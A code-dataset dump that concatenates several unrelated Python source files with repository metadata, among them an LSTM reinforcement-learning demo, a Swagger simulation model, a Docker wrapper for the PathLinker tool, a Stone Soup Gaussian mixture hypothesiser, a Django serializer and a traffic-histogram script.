49f13b101323835947d8e0f19cb369eece2aefcf
| 3,966
|
py
|
Python
|
tools/lstm_dql_6.py
|
alexis-jacq/signals
|
3c960e125ed5265dfc9cd3278df948f3c846a5dd
|
[
"0BSD"
] | 1
|
2020-02-18T12:52:02.000Z
|
2020-02-18T12:52:02.000Z
|
tools/lstm_dql_6.py
|
alexis-jacq/signals
|
3c960e125ed5265dfc9cd3278df948f3c846a5dd
|
[
"0BSD"
] | null | null | null |
tools/lstm_dql_6.py
|
alexis-jacq/signals
|
3c960e125ed5265dfc9cd3278df948f3c846a5dd
|
[
"0BSD"
] | null | null | null |
from Tkinter import *
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
master = Tk()
goal = 0
var_goal = StringVar()
GAMMA = 0.9
last_state = Variable(torch.Tensor([0,0,0,0,0,0])).unsqueeze(0)
last_action = 0
last_reward = 0
class Policy(nn.Module):
def __init__(self):
super(Policy, self).__init__()
self.lstm = nn.LSTMCell(6, 6)
self.fc = nn.Linear(6, 2)
#self.softmax = nn.LogSoftmax()
self.states = []
self.next_states = []
self.actions = []
self.rewards = []
self.hiddens = []
self.cells = []
def forward(self, input, hidden):
hx,cx = self.lstm(input,hidden)
output = self.fc(hx)
#output = self.softmax(output)
return output, hx, cx
def initHidden(self):
self.cell_state = Variable(torch.zeros(1,6))
self.hidden_state = Variable(torch.zeros(1,6))
model = Policy()
model.initHidden()
last_hidden = model.hidden_state
last_cell = model.cell_state
optimizer = optim.Adam(model.parameters(), lr=0.01)
def select_action(state):
output, model.hidden_state, model.cell_state = model(state, [model.hidden_state, model.cell_state])
print('val '+str(output.data))
probs = F.softmax(output)
print('probs '+str(probs.data))
action = probs.multinomial()
return action.data[0,0]
def learn(indice):
state = model.states[indice]
next_state = model.next_states[indice].detach()
action = model.actions[indice]
reward = model.rewards[indice]
hidden = model.hiddens[indice]
cell = model.cells[indice]
output, next_hidden, next_cell = model(state, [hidden, cell])
value = output[0,action]
    output,_,_ = model(next_state, [next_hidden.detach(), next_cell.detach()])
#'''
next_action_probs = F.softmax(output)
next_action = next_action_probs.multinomial().data[0,0]
next_value = output[0,next_action]
'''
next_value = output.max(1)[0]
#'''
expected = GAMMA*next_value + reward
td_loss = F.smooth_l1_loss(value, expected)
optimizer.zero_grad()
td_loss.backward(retain_variables=True)
optimizer.step()
def update(signal):
global last_action
global last_state
global last_reward
global last_hidden
global last_cell
state = Variable(torch.Tensor([signal,signal,signal,signal,signal,signal]).float()).unsqueeze(0)
if np.abs(last_reward)>0 or np.random.rand()>0.9 or len(model.states)<10:
model.states.append(last_state)
model.next_states.append(state)
model.rewards.append(last_reward)
model.actions.append(last_action)
model.hiddens.append(last_hidden)
model.cells.append(last_cell)
last_hidden = model.hidden_state
last_cell = model.cell_state
action = select_action(state)
print(action)
reward = 0
if action==1 and goal==1:
reward = 1
if action==1 and goal==0:
reward = -1
if action==0:
learn(np.random.choice(len(model.states)))
else:
learn(-1)
last_action = action
last_state = state
last_reward = reward
def set_goal(new_goal):
global goal
goal = new_goal
print("goal = "+str(goal))
var_goal.set('goal = '+str(goal))
Button(master, text='S1', height = 10, width = 30, command=lambda:update(0)).grid(row=0, column=0, sticky=W, pady=4)
Button(master, text='S2', height = 10, width = 30, command=lambda:update(1)).grid(row=0, column=1, sticky=W, pady=4)
Button(master, text='goal 0', height = 10, width = 30, command=lambda:set_goal(0)).grid(row=1, column=0, sticky=W, pady=4)
Button(master, text='goal 1', height = 10, width = 30, command=lambda:set_goal(1)).grid(row=1, column=1, sticky=W, pady=4)
Label(master, height = 10, textvariable = var_goal).grid(row=2, sticky=EW, pady=4)
mainloop( )
| 28.73913
| 122
| 0.660111
| 670
| 0.168936
| 0
| 0
| 0
| 0
| 0
| 0
| 167
| 0.042108
|
49f1fc4e36bfb8c6234c3e939d335df6e0c3dae5
| 500
|
py
|
Python
|
Engine/Shaders/compile_all_shader.py
|
ValtoGameEngines/Fish-Engine
|
a4b9fb9b0a6dc202f7990e75f4b7d8d5163209d9
|
[
"MIT"
] | 240
|
2017-02-17T10:08:19.000Z
|
2022-03-25T14:45:29.000Z
|
Engine/Shaders/compile_all_shader.py
|
ValtoGameEngines/Fish-Engine
|
a4b9fb9b0a6dc202f7990e75f4b7d8d5163209d9
|
[
"MIT"
] | 2
|
2016-10-12T07:08:38.000Z
|
2017-04-05T01:56:30.000Z
|
Engine/Shaders/compile_all_shader.py
|
yushroom/FishEngine
|
a4b9fb9b0a6dc202f7990e75f4b7d8d5163209d9
|
[
"MIT"
] | 39
|
2017-03-02T09:40:07.000Z
|
2021-12-04T07:28:53.000Z
|
import os
import sys
compiler = r'../Binary/RelWithDebInfo/ShaderCompiler'
#compiler = r'../Binary/Debug/ShaderCompiler'
shader_dirs = ['.', './Editor']
count = 0
for d in shader_dirs:
for fn in os.listdir(d):
print(fn)
ext = fn.split('.')[-1]
if ext in ['surf', 'shader']:
cmd = compiler + ' ' + os.path.abspath(os.path.join(d, fn))
print(cmd)
if os.system(cmd) != 0:
print("Compile ERROR: ", fn)
sys.exit()
count += 1
print("Done. {} shaders compiled.".format(count))
| 22.727273
| 62
| 0.624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 165
| 0.33
|
49f2ebec4bd34c27d749eb184a9d941a3fa4ea04
| 14,058
|
py
|
Python
|
rbb_server/src/rbb_swagger_server/models/simulation_detailed.py
|
SK4P3/rbb_core
|
618617270314af5335de30179072244e1f440c4c
|
[
"MIT"
] | 55
|
2019-05-09T06:43:05.000Z
|
2021-12-08T05:56:43.000Z
|
rbb_server/src/rbb_swagger_server/models/simulation_detailed.py
|
SK4P3/rbb_core
|
618617270314af5335de30179072244e1f440c4c
|
[
"MIT"
] | 5
|
2019-09-08T15:33:28.000Z
|
2021-04-17T17:30:53.000Z
|
rbb_server/src/rbb_swagger_server/models/simulation_detailed.py
|
SK4P3/rbb_core
|
618617270314af5335de30179072244e1f440c4c
|
[
"MIT"
] | 16
|
2019-08-08T07:15:35.000Z
|
2021-12-07T15:34:41.000Z
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from rbb_swagger_server.models.base_model_ import Model
from rbb_swagger_server.models.simulation_environment_detailed import SimulationEnvironmentDetailed # noqa: F401,E501
from rbb_swagger_server.models.simulation_run_detailed import SimulationRunDetailed # noqa: F401,E501
from rbb_swagger_server.models.simulation_summary import SimulationSummary # noqa: F401,E501
from rbb_swagger_server.models.task_detailed import TaskDetailed # noqa: F401,E501
from rbb_swagger_server import util
class SimulationDetailed(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, detail_type: str=None, identifier: int=None, description: str=None, created: datetime=None, result: int=None, environment_name: str=None, queued_task_identifier: str=None, queued_task_state: int=None, config: object=None, on_complete_action: object=None, environment: SimulationEnvironmentDetailed=None, runs: List[SimulationRunDetailed]=None, queued_task: TaskDetailed=None): # noqa: E501
"""SimulationDetailed - a model defined in Swagger
:param detail_type: The detail_type of this SimulationDetailed. # noqa: E501
:type detail_type: str
:param identifier: The identifier of this SimulationDetailed. # noqa: E501
:type identifier: int
:param description: The description of this SimulationDetailed. # noqa: E501
:type description: str
:param created: The created of this SimulationDetailed. # noqa: E501
:type created: datetime
:param result: The result of this SimulationDetailed. # noqa: E501
:type result: int
:param environment_name: The environment_name of this SimulationDetailed. # noqa: E501
:type environment_name: str
:param queued_task_identifier: The queued_task_identifier of this SimulationDetailed. # noqa: E501
:type queued_task_identifier: str
:param queued_task_state: The queued_task_state of this SimulationDetailed. # noqa: E501
:type queued_task_state: int
:param config: The config of this SimulationDetailed. # noqa: E501
:type config: object
:param on_complete_action: The on_complete_action of this SimulationDetailed. # noqa: E501
:type on_complete_action: object
:param environment: The environment of this SimulationDetailed. # noqa: E501
:type environment: SimulationEnvironmentDetailed
:param runs: The runs of this SimulationDetailed. # noqa: E501
:type runs: List[SimulationRunDetailed]
:param queued_task: The queued_task of this SimulationDetailed. # noqa: E501
:type queued_task: TaskDetailed
"""
self.swagger_types = {
'detail_type': str,
'identifier': int,
'description': str,
'created': datetime,
'result': int,
'environment_name': str,
'queued_task_identifier': str,
'queued_task_state': int,
'config': object,
'on_complete_action': object,
'environment': SimulationEnvironmentDetailed,
'runs': List[SimulationRunDetailed],
'queued_task': TaskDetailed
}
self.attribute_map = {
'detail_type': 'detail_type',
'identifier': 'identifier',
'description': 'description',
'created': 'created',
'result': 'result',
'environment_name': 'environment_name',
'queued_task_identifier': 'queued_task_identifier',
'queued_task_state': 'queued_task_state',
'config': 'config',
'on_complete_action': 'on_complete_action',
'environment': 'environment',
'runs': 'runs',
'queued_task': 'queued_task'
}
self._detail_type = detail_type
self._identifier = identifier
self._description = description
self._created = created
self._result = result
self._environment_name = environment_name
self._queued_task_identifier = queued_task_identifier
self._queued_task_state = queued_task_state
self._config = config
self._on_complete_action = on_complete_action
self._environment = environment
self._runs = runs
self._queued_task = queued_task
@classmethod
def from_dict(cls, dikt) -> 'SimulationDetailed':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The SimulationDetailed of this SimulationDetailed. # noqa: E501
:rtype: SimulationDetailed
"""
return util.deserialize_model(dikt, cls)
@property
def detail_type(self) -> str:
"""Gets the detail_type of this SimulationDetailed.
:return: The detail_type of this SimulationDetailed.
:rtype: str
"""
return self._detail_type
@detail_type.setter
def detail_type(self, detail_type: str):
"""Sets the detail_type of this SimulationDetailed.
:param detail_type: The detail_type of this SimulationDetailed.
:type detail_type: str
"""
if detail_type is None:
raise ValueError("Invalid value for `detail_type`, must not be `None`") # noqa: E501
self._detail_type = detail_type
@property
def identifier(self) -> int:
"""Gets the identifier of this SimulationDetailed.
:return: The identifier of this SimulationDetailed.
:rtype: int
"""
return self._identifier
@identifier.setter
def identifier(self, identifier: int):
"""Sets the identifier of this SimulationDetailed.
:param identifier: The identifier of this SimulationDetailed.
:type identifier: int
"""
if identifier is None:
raise ValueError("Invalid value for `identifier`, must not be `None`") # noqa: E501
self._identifier = identifier
@property
def description(self) -> str:
"""Gets the description of this SimulationDetailed.
:return: The description of this SimulationDetailed.
:rtype: str
"""
return self._description
@description.setter
def description(self, description: str):
"""Sets the description of this SimulationDetailed.
:param description: The description of this SimulationDetailed.
:type description: str
"""
self._description = description
@property
def created(self) -> datetime:
"""Gets the created of this SimulationDetailed.
:return: The created of this SimulationDetailed.
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created: datetime):
"""Sets the created of this SimulationDetailed.
:param created: The created of this SimulationDetailed.
:type created: datetime
"""
if created is None:
raise ValueError("Invalid value for `created`, must not be `None`") # noqa: E501
self._created = created
@property
def result(self) -> int:
"""Gets the result of this SimulationDetailed.
0 is scheduled, -1 is prep failed, -100 is sim failed, 100 is sim succeeded # noqa: E501
:return: The result of this SimulationDetailed.
:rtype: int
"""
return self._result
@result.setter
def result(self, result: int):
"""Sets the result of this SimulationDetailed.
0 is scheduled, -1 is prep failed, -100 is sim failed, 100 is sim succeeded # noqa: E501
:param result: The result of this SimulationDetailed.
:type result: int
"""
if result is None:
raise ValueError("Invalid value for `result`, must not be `None`") # noqa: E501
self._result = result
@property
def environment_name(self) -> str:
"""Gets the environment_name of this SimulationDetailed.
Name of the simulation environment # noqa: E501
:return: The environment_name of this SimulationDetailed.
:rtype: str
"""
return self._environment_name
@environment_name.setter
def environment_name(self, environment_name: str):
"""Sets the environment_name of this SimulationDetailed.
Name of the simulation environment # noqa: E501
:param environment_name: The environment_name of this SimulationDetailed.
:type environment_name: str
"""
if environment_name is None:
raise ValueError("Invalid value for `environment_name`, must not be `None`") # noqa: E501
self._environment_name = environment_name
@property
def queued_task_identifier(self) -> str:
"""Gets the queued_task_identifier of this SimulationDetailed.
Identifier of the task associated to this simulation # noqa: E501
:return: The queued_task_identifier of this SimulationDetailed.
:rtype: str
"""
return self._queued_task_identifier
@queued_task_identifier.setter
def queued_task_identifier(self, queued_task_identifier: str):
"""Sets the queued_task_identifier of this SimulationDetailed.
Identifier of the task associated to this simulation # noqa: E501
:param queued_task_identifier: The queued_task_identifier of this SimulationDetailed.
:type queued_task_identifier: str
"""
self._queued_task_identifier = queued_task_identifier
@property
def queued_task_state(self) -> int:
"""Gets the queued_task_state of this SimulationDetailed.
Read only value, taken from associated task # noqa: E501
:return: The queued_task_state of this SimulationDetailed.
:rtype: int
"""
return self._queued_task_state
@queued_task_state.setter
def queued_task_state(self, queued_task_state: int):
"""Sets the queued_task_state of this SimulationDetailed.
Read only value, taken from associated task # noqa: E501
:param queued_task_state: The queued_task_state of this SimulationDetailed.
:type queued_task_state: int
"""
self._queued_task_state = queued_task_state
@property
def config(self) -> object:
"""Gets the config of this SimulationDetailed.
Configuration of the simulation. # noqa: E501
:return: The config of this SimulationDetailed.
:rtype: object
"""
return self._config
@config.setter
def config(self, config: object):
"""Sets the config of this SimulationDetailed.
Configuration of the simulation. # noqa: E501
:param config: The config of this SimulationDetailed.
:type config: object
"""
if config is None:
raise ValueError("Invalid value for `config`, must not be `None`") # noqa: E501
self._config = config
@property
def on_complete_action(self) -> object:
"""Gets the on_complete_action of this SimulationDetailed.
Action to take when simulation completes. # noqa: E501
:return: The on_complete_action of this SimulationDetailed.
:rtype: object
"""
return self._on_complete_action
@on_complete_action.setter
def on_complete_action(self, on_complete_action: object):
"""Sets the on_complete_action of this SimulationDetailed.
Action to take when simulation completes. # noqa: E501
:param on_complete_action: The on_complete_action of this SimulationDetailed.
:type on_complete_action: object
"""
self._on_complete_action = on_complete_action
@property
def environment(self) -> SimulationEnvironmentDetailed:
"""Gets the environment of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:return: The environment of this SimulationDetailed.
:rtype: SimulationEnvironmentDetailed
"""
return self._environment
@environment.setter
def environment(self, environment: SimulationEnvironmentDetailed):
"""Sets the environment of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:param environment: The environment of this SimulationDetailed.
:type environment: SimulationEnvironmentDetailed
"""
self._environment = environment
@property
def runs(self) -> List[SimulationRunDetailed]:
"""Gets the runs of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:return: The runs of this SimulationDetailed.
:rtype: List[SimulationRunDetailed]
"""
return self._runs
@runs.setter
def runs(self, runs: List[SimulationRunDetailed]):
"""Sets the runs of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:param runs: The runs of this SimulationDetailed.
:type runs: List[SimulationRunDetailed]
"""
self._runs = runs
@property
def queued_task(self) -> TaskDetailed:
"""Gets the queued_task of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:return: The queued_task of this SimulationDetailed.
:rtype: TaskDetailed
"""
return self._queued_task
@queued_task.setter
def queued_task(self, queued_task: TaskDetailed):
"""Sets the queued_task of this SimulationDetailed.
Read only value, expanded on request. # noqa: E501
:param queued_task: The queued_task of this SimulationDetailed.
:type queued_task: TaskDetailed
"""
self._queued_task = queued_task
| 34.20438
| 413
| 0.660905
| 13,411
| 0.953976
| 0
| 0
| 9,323
| 0.663181
| 0
| 0
| 8,506
| 0.605065
|
49f3758e9d44d3107ec62931b01722d7ad937589
| 5,857
|
py
|
Python
|
src/pathlinker.py
|
melliott432/spras
|
ba914f6a55a51c3e3b55b56844a533ff2936fae5
|
[
"MIT"
] | 3
|
2021-05-05T23:40:39.000Z
|
2021-05-13T03:35:22.000Z
|
src/pathlinker.py
|
melliott432/spras
|
ba914f6a55a51c3e3b55b56844a533ff2936fae5
|
[
"MIT"
] | 41
|
2021-04-27T01:48:28.000Z
|
2022-03-14T20:11:24.000Z
|
src/pathlinker.py
|
melliott432/spras
|
ba914f6a55a51c3e3b55b56844a533ff2936fae5
|
[
"MIT"
] | 2
|
2021-07-06T18:27:19.000Z
|
2022-01-25T03:56:49.000Z
|
import docker
import os
import sys
import pandas as pd
import warnings
from src.PRM import PRM
from pathlib import Path
from src.util import prepare_path_docker
__all__ = ['PathLinker']
class PathLinker(PRM):
required_inputs = ['nodetypes', 'network']
@staticmethod
def generate_inputs(data, filename_map):
"""
Access fields from the dataset and write the required input files
@param data: dataset
@param filename_map: a dict mapping file types in the required_inputs to the filename for that type
@return:
"""
for input_type in PathLinker.required_inputs:
if input_type not in filename_map:
raise ValueError(f"{input_type} filename is missing")
#Get sources and targets for node input file
sources_targets = data.request_node_columns(["sources", "targets"])
if sources_targets is None:
return False
both_series = sources_targets.sources & sources_targets.targets
for index,row in sources_targets[both_series].iterrows():
warn_msg = row.NODEID+" has been labeled as both a source and a target."
warnings.warn(warn_msg)
#Create nodetype file
input_df = sources_targets[["NODEID"]].copy()
input_df.columns = ["#Node"]
input_df.loc[sources_targets["sources"] == True,"Node type"]="source"
input_df.loc[sources_targets["targets"] == True,"Node type"]="target"
input_df.to_csv(filename_map["nodetypes"],sep="\t",index=False,columns=["#Node","Node type"])
#This is pretty memory intensive. We might want to keep the interactome centralized.
data.get_interactome().to_csv(filename_map["network"],sep="\t",index=False,columns=["Interactor1","Interactor2","Weight"],header=["#Interactor1","Interactor2","Weight"])
# Skips parameter validation step
@staticmethod
def run(nodetypes=None, network=None, output_file=None, k=None):
"""
Run PathLinker with Docker
@param nodetypes: input node types with sources and targets (required)
@param network: input network file (required)
@param output_file: path to the output pathway file (required)
@param k: path length (optional)
"""
# Add additional parameter validation
# Do not require k
# Use the PathLinker default
# Could consider setting the default here instead
if not nodetypes or not network or not output_file:
raise ValueError('Required PathLinker arguments are missing')
# Initialize a Docker client using environment variables
client = docker.from_env()
# work dir set as the root of the repository
work_dir = Path(__file__).parent.parent.absolute()
# create path objects for input files
node_file = Path(nodetypes)
network_file = Path(network)
out_dir = Path(output_file).parent
# When renaming the output file, the output directory must already exist
Path(work_dir, out_dir).mkdir(parents=True, exist_ok=True)
command = ['python', '/home/run.py', '/home/spras/'+network_file.as_posix(),
'/home/spras/'+node_file.as_posix()]
# Add optional argument
if k is not None:
command.extend(['-k', str(k)])
#Don't perform this step on systems where permissions aren't an issue like windows
need_chown = True
try:
uid = os.getuid()
except AttributeError:
need_chown = False
try:
container_output = client.containers.run(
'reedcompbio/pathlinker',
command,
stderr=True,
volumes={
prepare_path_docker(work_dir): {'bind': '/home/spras', 'mode': 'rw'}
},
working_dir='/home/spras/')
print(container_output.decode('utf-8'))
if need_chown:
#This command changes the ownership of output files so we don't
# get a permissions error when snakemake tries to touch the files
# PathLinker writes output files to the working directory
chown_command = " ".join(['chown',str(uid),'./out*-ranked-edges.txt'])
client.containers.run('reedcompbio/pathlinker',
chown_command,
stderr=True,
volumes={prepare_path_docker(work_dir): {'bind': '/home/spras', 'mode': 'rw'}},
working_dir='/home/spras/')
finally:
# Not sure whether this is needed
client.close()
# Rename the primary output file to match the desired output filename
# Currently PathLinker only writes one output file so we do not need to delete others
Path(output_file).unlink(missing_ok=True)
# We may not know the value of k that was used
output_edges = Path(next(work_dir.glob('out*-ranked-edges.txt')))
output_edges.rename(output_file)
@staticmethod
def parse_output(raw_pathway_file, standardized_pathway_file):
"""
Convert a predicted pathway into the universal format
@param raw_pathway_file: pathway file produced by an algorithm's run function
@param standardized_pathway_file: the same pathway written in the universal format
"""
# Questions: should there be a header/optional columns?
# What about multiple raw_pathway_files
# We should not allow spaces in the node names if we use space separator.
df = pd.read_csv(raw_pathway_file,sep='\t').take([0,1,2],axis=1)
df.to_csv(standardized_pathway_file, header=False,index=False,sep=' ')
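# Hedged usage sketch (the file paths are placeholders; running it requires Docker and
# the reedcompbio/pathlinker image, as described in run() above):
if __name__ == '__main__':
    PathLinker.run(nodetypes='input/nodetypes.txt',
                   network='input/network.txt',
                   output_file='output/pathlinker-ranked-edges.txt',
                   k=100)
    PathLinker.parse_output('output/pathlinker-ranked-edges.txt',
                            'output/pathlinker-pathway.txt')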
| 42.751825
| 177
| 0.626771
| 5,668
| 0.967731
| 0
| 0
| 5,542
| 0.946218
| 0
| 0
| 2,631
| 0.449206
|
49f40691673fa4f67fa8dd4ced6c7bd474270052
| 4,978
|
py
|
Python
|
stonesoup/hypothesiser/gaussianmixture.py
|
mgomesborges/Stone-Soup
|
39c7f02ce11e10c9b3c612ad359f6d8bca495266
|
[
"MIT"
] | 1
|
2019-12-26T14:55:03.000Z
|
2019-12-26T14:55:03.000Z
|
stonesoup/hypothesiser/gaussianmixture.py
|
mgomesborges/Stone-Soup
|
39c7f02ce11e10c9b3c612ad359f6d8bca495266
|
[
"MIT"
] | null | null | null |
stonesoup/hypothesiser/gaussianmixture.py
|
mgomesborges/Stone-Soup
|
39c7f02ce11e10c9b3c612ad359f6d8bca495266
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .base import Hypothesiser
from ..base import Property
from ..types.multihypothesis import MultipleHypothesis
from ..types.prediction import (TaggedWeightedGaussianStatePrediction,
WeightedGaussianStatePrediction)
from ..types.state import TaggedWeightedGaussianState
class GaussianMixtureHypothesiser(Hypothesiser):
"""Gaussian Mixture Prediction Hypothesiser based on an underlying Hypothesiser
Generates a list of :class:`MultipleHypothesis`, where each
MultipleHypothesis in the list contains SingleHypotheses
pertaining to an individual component-detection hypothesis
"""
hypothesiser = Property(
Hypothesiser,
doc="Underlying hypothesiser used to generate detection-target pairs")
order_by_detection = Property(
bool,
default=False,
doc="Flag to order the :class:`~.MultipleHypothesis` "
"list by detection or component")
def hypothesise(self, components, detections, timestamp):
"""Form hypotheses for associations between Detections and Gaussian
Mixture components.
Parameters
----------
components : :class:`list`
List of :class:`~.WeightedGaussianState` components
representing the state of the target space
detections : list of :class:`Detection`
Retrieved measurements
timestamp : datetime
Time of the detections/predicted states
Returns
-------
list of :class:`~.MultipleHypothesis`
Each :class:`~.MultipleHypothesis` in the list contains
a list of :class:`~SingleHypothesis` pertaining
to the same Gaussian component unless
order_by_detection is true, then they
pertain to the same Detection.
"""
# Check to make sure all detections are obtained from the same time
timestamps = set([detection.timestamp for detection in detections])
if len(timestamps) > 1:
raise ValueError("All detections must have the same timestamp")
hypotheses = list()
for component in components:
# Get hypotheses for that component for all measurements
component_hypotheses = self.hypothesiser.hypothesise(component,
detections,
timestamp)
for hypothesis in component_hypotheses:
if isinstance(component, TaggedWeightedGaussianState):
hypothesis.prediction = \
TaggedWeightedGaussianStatePrediction(
tag=component.tag if component.tag != "birth"
else None,
weight=component.weight,
state_vector=hypothesis.prediction.state_vector,
covar=hypothesis.prediction.covar,
timestamp=hypothesis.prediction.timestamp
)
else:
hypothesis.prediction = WeightedGaussianStatePrediction(
weight=component.weight,
state_vector=hypothesis.prediction.state_vector,
covar=hypothesis.prediction.covar,
timestamp=hypothesis.prediction.timestamp
)
# Create Multiple Hypothesis and add to list
if len(component_hypotheses) > 0:
hypotheses.append(MultipleHypothesis(component_hypotheses))
# Reorder list of MultipleHypothesis so that they are ordered
# by detection, not component
if self.order_by_detection:
single_hypothesis_list = list()
# Retrieve all single hypotheses
for multiple_hypothesis in hypotheses:
for single_hypothesis in multiple_hypothesis:
single_hypothesis_list.append(single_hypothesis)
reordered_hypotheses = list()
            # Collect the hypotheses for missed detections
miss_detections_hypothesis = MultipleHypothesis(
[x for x in single_hypothesis_list if not x])
for detection in detections:
# Create multiple hypothesis per detection
detection_multiple_hypothesis = \
                    MultipleHypothesis([hypothesis for hypothesis in single_hypothesis_list
                                        if hypothesis.measurement == detection])
# Add to new list
reordered_hypotheses.append(detection_multiple_hypothesis)
# Add miss detected hypothesis to end
reordered_hypotheses.append(miss_detections_hypothesis)
# Assign reordered list to original list
hypotheses = reordered_hypotheses
return hypotheses
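# --- Illustrative usage sketch (not part of the original module) ---
# A minimal sketch of how this hypothesiser might be wired up and called.
# `base_hypothesiser`, `components` (a list of WeightedGaussianState objects),
# `detections`, and `timestamp` are placeholders supplied by the surrounding tracker.
#
# gm_hypothesiser = GaussianMixtureHypothesiser(
#     hypothesiser=base_hypothesiser,      # any single-target Hypothesiser
#     order_by_detection=True)             # group the output per detection
# multi_hypotheses = gm_hypothesiser.hypothesise(components, detections, timestamp)
# for multi_hypothesis in multi_hypotheses:
#     for single_hypothesis in multi_hypothesis:
#         print(single_hypothesis.measurement, single_hypothesis.prediction.weight)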
| 45.669725
| 96
| 0.606268
| 4,647
| 0.933507
| 0
| 0
| 0
| 0
| 0
| 0
| 1,767
| 0.354962
|
49f45e903b240c04c0489fac65ede708075df463
| 1,458
|
py
|
Python
|
apps/approval/api/serializers.py
|
emilps/onlineweb4
|
6f4aca2a4522698366ecdc6ab63c807ce5df2a96
|
[
"MIT"
] | null | null | null |
apps/approval/api/serializers.py
|
emilps/onlineweb4
|
6f4aca2a4522698366ecdc6ab63c807ce5df2a96
|
[
"MIT"
] | null | null | null |
apps/approval/api/serializers.py
|
emilps/onlineweb4
|
6f4aca2a4522698366ecdc6ab63c807ce5df2a96
|
[
"MIT"
] | null | null | null |
from django.core.exceptions import ValidationError as DjangoValidationError
from rest_framework import serializers
from apps.approval.models import CommitteeApplication, CommitteePriority
from apps.authentication.serializers import UserSerializer
class CommitteeSerializer(serializers.ModelSerializer):
group_name = serializers.SerializerMethodField(source='group')
class Meta:
model = CommitteePriority
fields = ('group', 'group_name', 'priority')
def get_group_name(self, instance):
return instance.group.name
class CommitteeApplicationSerializer(serializers.ModelSerializer):
committees = CommitteeSerializer(many=True, source='committeepriority_set')
applicant = UserSerializer(read_only=True)
class Meta:
model = CommitteeApplication
fields = ('name', 'email', 'applicant', 'application_text', 'prioritized', 'committees')
def create(self, validated_data):
committees = validated_data.pop('committeepriority_set')
application = CommitteeApplication(**validated_data)
try:
application.clean()
except DjangoValidationError as django_error:
raise serializers.ValidationError(django_error.message)
application.save()
for committee in committees:
CommitteePriority.objects.create(committee_application=application, **committee)
return CommitteeApplication.objects.get(pk=application.pk)
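# --- Illustrative usage sketch (not part of the original module) ---
# How the serializer above might be exercised from a view or test, assuming a
# configured Django project; the group ids and field values are placeholders.
#
# payload = {
#     'name': 'Ola Nordmann',
#     'email': 'ola@example.org',
#     'application_text': 'I would like to join.',
#     'prioritized': True,
#     'committees': [{'group': 1, 'priority': 1}, {'group': 2, 'priority': 2}],
# }
# serializer = CommitteeApplicationSerializer(data=payload)
# serializer.is_valid(raise_exception=True)
# application = serializer.save()  # runs create(), which also creates the CommitteePriority rows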
| 36.45
| 96
| 0.742798
| 1,204
| 0.825789
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.102195
|
49f6c77afc94bafb870dc3b17a265d3485c6c64e
| 2,909
|
py
|
Python
|
visualization/histogram.py
|
SalikLP/classification-of-encrypted-traffic
|
3c86e098aab58941f9339bb64945c1112ab556ef
|
[
"MIT"
] | 35
|
2018-05-25T16:48:23.000Z
|
2022-03-15T14:35:07.000Z
|
visualization/histogram.py
|
SalikLP/classification-of-encrypted-traffic
|
3c86e098aab58941f9339bb64945c1112ab556ef
|
[
"MIT"
] | 3
|
2018-03-18T13:03:09.000Z
|
2020-01-17T12:09:12.000Z
|
visualization/histogram.py
|
SalikLP/classification-of-encrypted-traffic
|
3c86e098aab58941f9339bb64945c1112ab556ef
|
[
"MIT"
] | 14
|
2018-05-25T16:48:24.000Z
|
2022-01-04T12:56:31.000Z
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
# sklearn.cross_validation was removed in scikit-learn 0.20; model_selection is the current home
from sklearn.model_selection import train_test_split
import utils
import glob, os
import pca.dataanalyzer as da, pca.pca as pca
from sklearn.metrics import accuracy_score
# visualize the important characteristics of the dataset
import matplotlib.pyplot as plt
seed = 0
num_headers = 16
data_len = 54*num_headers #1460
dirs = ["C:/Users/salik/Documents/Data/LinuxChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsFirefox/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsSalik/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsAndreas/{}/".format(num_headers)]
# dirs = ["E:/Data/h5/https/", "E:/Data/h5/netflix/"]
# step 1: get the data
dataframes = []
num_examples = 0
for dir in dirs:
for fullname in glob.iglob(dir + '*.h5'):
filename = os.path.basename(fullname)
df = utils.load_h5(dir, filename)
dataframes.append(df)
num_examples = len(df.values)
# create one large dataframe
data = pd.concat(dataframes)
data = data.sample(frac=1, random_state=seed).reset_index(drop=True)  # sample() returns a new frame; assign it so the shuffle takes effect
num_rows = data.shape[0]
columns = data.columns
print(columns)
# step 2: get features (x) and convert it to numpy array
x = da.getbytes(data, data_len)
# step 3: get class labels y and then encode it into number
# get class label data
y = data['label'].values
# encode the class label
class_labels = np.unique(y)
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(y)
# step 4: split the data into training set and test set
test_percentage = 0.5
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_percentage, random_state=seed)
plot_savename = "histogram_payload"
from matplotlib import rcParams
# Make room for xlabel which is otherwise cut off
rcParams.update({'figure.autolayout': True})
# scatter plot the sample points among 5 classes
# markers = ('s', 'd', 'o', '^', 'v', ".", ",", "<", ">", "8", "p", "P", "*", "h", "H", "+", "x", "X", "D", "|", "_")
color_map = {0: '#487fff', 1: '#d342ff', 2: '#4eff4e', 3: '#2ee3ff', 4: '#ffca43', 5:'#ff365e', 6:'#626663'}
plt.figure()
for idx, cl in enumerate(np.unique(y_test)):
# Get count of unique values
values, counts = np.unique(x_test[y_test == cl], return_counts=True)
# Maybe remove zero as there is a lot of zeros in the header
# values = values[1:]
# counts = counts[1:]
n, bins, patches = plt.hist(values, weights=counts, bins=256, facecolor=color_map[idx], label=class_labels[cl], alpha=0.8)
plt.legend(loc='upper right')
plt.title('Histogram of : {}'.format(class_labels))
